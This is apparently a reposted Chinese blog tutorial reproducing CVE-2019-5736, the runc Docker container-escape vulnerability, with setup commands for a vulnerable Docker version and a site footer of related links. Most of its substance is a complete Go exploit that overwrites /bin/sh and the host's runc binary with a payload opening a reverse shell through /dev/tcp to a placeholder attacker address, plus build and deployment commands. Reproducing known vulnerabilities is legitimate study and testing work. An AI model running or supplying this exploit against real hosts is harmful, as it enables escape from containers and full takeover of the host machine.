码上快乐

相关内容   简体   繁体

CVE-2019-5736复现

本文转载自  查看原文  2021-04-25 21:04  223    漏洞复现

CVE-2019-5736复现 docker逃逸漏洞

docker从容器中逃逸,访问到宿主机的资源甚至获得宿主机的权限就是docker逃逸

环境配置

sudo apt-get update

apt-cache madison docker-ce 查看可用的docker版本

sudo apt-get install docker-ce=18.06.1ce3-0~ubuntu 安装docker

漏洞复现

docker版本

image-20210425104924623

随便拉一个redis服务

image-20210425105134049

在个人主机上安装go环境

poc

package main

import (
	"fmt"
	"io/ioutil"
	"os"
	"strconv"
	"strings"
)

// This is the line of shell commands that will execute on the host
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/xxxxxxxip/xxxxport 0>& 1"

func main() {
	// First we overwrite /bin/sh with the /proc/self/exe interpreter path
	fd, err := os.Create("/bin/sh")
	if err != nil {
		fmt.Println(err)
		return
	}
	fmt.Fprintln(fd, "#!/proc/self/exe")
	err = fd.Close()
	if err != nil {
		fmt.Println(err)
		return
	}
	fmt.Println("[+] Overwritten /bin/sh successfully")

	// Loop through all processes to find one whose cmdline includes runcinit
	// This will be the process created by runc
	var found int
	for found == 0 {
		pids, err := ioutil.ReadDir("/proc")
		if err != nil {
			fmt.Println(err)
			return
		}
		for _, f := range pids {
			fbytes, _ := ioutil.ReadFile("/proc/" + f.Name() + "/cmdline")
			fstring := string(fbytes)
			if strings.Contains(fstring, "runc") {
				fmt.Println("[+] Found the PID:", f.Name())
				found, err = strconv.Atoi(f.Name())
				if err != nil {
					fmt.Println(err)
					return
				}
			}
		}
	}

	// We will use the pid to get a file handle for runc on the host.
	var handleFd = -1
	for handleFd == -1 {
		// Note, you do not need to use the O_PATH flag for the exploit to work.
		handle, _ := os.OpenFile("/proc/"+strconv.Itoa(found)+"/exe", os.O_RDONLY, 0777)
		if int(handle.Fd()) > 0 {
			handleFd = int(handle.Fd())
		}
	}
	fmt.Println("[+] Successfully got the file handle")

	// Now that we have the file handle, lets write to the runc binary and overwrite it
	// It will maintain it's executable flag
	for {
		writeHandle, _ := os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700)
		if int(writeHandle.Fd()) > 0 {
			fmt.Println("[+] Successfully got write handle", writeHandle)
			writeHandle.Write([]byte(payload))
			return
		}
	}
}

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go编译payload

docker cp main 503:/home

docker exec -it 503 /bin/bash

image-20210425110955015


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 docker逃逸漏洞复现(CVE-2019-5736) docker逃逸漏洞复现(CVE-2019-5736) Docker逃逸--runC容器逃逸漏洞(CVE-2019-5736) Docker runC 严重安全漏洞CVE-2019-5736 导致容器逃逸 CVE-2019-0708漏洞复现 CVE-2019-0232漏洞复现 CVE-2019-0708复现之旅 cve2019-0708漏洞复现 CVE-2019-11043漏洞分析与复现 CVE-2019-12384 复现分析
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM